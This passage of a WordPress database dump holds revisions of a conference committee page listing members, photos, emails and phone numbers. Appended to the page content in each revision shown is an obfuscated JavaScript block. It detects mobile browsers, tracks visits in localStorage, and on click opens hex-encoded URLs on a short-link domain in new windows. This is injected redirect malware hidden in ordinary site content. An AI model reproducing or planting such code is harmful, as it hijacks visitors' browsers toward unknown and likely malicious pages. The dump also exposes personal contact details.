Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:14:58','2023-08-13 20:14:58','',4849,'https://gsw2023.com/?p=5164',0,'revision','',0),
(5165,1,'2023-08-13 20:16:03','2023-08-13 20:16:03','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"106\" height=\"150\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"147\" height=\"165\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:16:03','2023-08-13 20:16:03','',4849,'https://gsw2023.com/?p=5165',0,'revision','',0),
(5166,1,'2023-08-13 20:17:26','2023-08-13 20:17:26','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px 